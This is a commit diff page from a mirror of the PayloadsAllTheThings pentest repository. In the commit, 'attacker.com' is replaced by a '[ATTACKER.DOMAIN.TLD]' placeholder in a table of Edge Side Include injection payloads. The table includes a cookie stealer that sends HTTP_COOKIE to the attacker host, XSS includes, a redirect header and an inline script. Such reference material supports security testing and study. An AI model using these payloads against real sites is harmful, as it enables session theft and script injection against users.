gitea-mirror/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2026-04-28 11:33:06 -07:00
Code Issues Packages Projects Releases Wiki Activity

Normalize commands, callbacks and references

Browse Source
This commit is contained in:
Swissky
2026-04-22 15:03:31 +02:00
parent a79b1f5692
commit d4e6eda4ad
17 changed files with 114 additions and 114 deletions
Download Patch File Download Diff File Expand all files Collapse all files

8
Server Side Include Injection/README.md
View File

@@ -48,12 +48,12 @@ Surrogate-Control: content="ESI/1.0"
| Description | Payload |
| ----------------------- | ---------------------------------------- |
| Blind detection | `<esi:include src=http://attacker.com>` |
| XSS | `<esi:include src=http://attacker.com/XSSPAYLOAD.html>` |
| Cookie stealer | `<esi:include src=http://attacker.com/?cookie_stealer.php?=$(HTTP_COOKIE)>` |
| Blind detection | `<esi:include src=http://[ATTACKER.DOMAIN.TLD]>` |
| XSS | `<esi:include src=http://[ATTACKER.DOMAIN.TLD]/XSSPAYLOAD.html>` |
| Cookie stealer | `<esi:include src=http://[ATTACKER.DOMAIN.TLD]/?cookie_stealer.php?=$(HTTP_COOKIE)>` |
| Include a file | `<esi:include src="supersecret.txt">` |
| Display debug info | `<esi:debug/>` |
| Add header | `<!--esi $add_header('Location','http://attacker.com') -->` |
| Add header | `<!--esi $add_header('Location','http://[ATTACKER.DOMAIN.TLD]') -->` |
| Inline fragment | `<esi:inline name="/attack.html" fetchable="yes"><script>prompt('XSS')</script></esi:inline>` |
| Software | Includes | Vars | Cookies | Upstream Headers Required | Host Whitelist |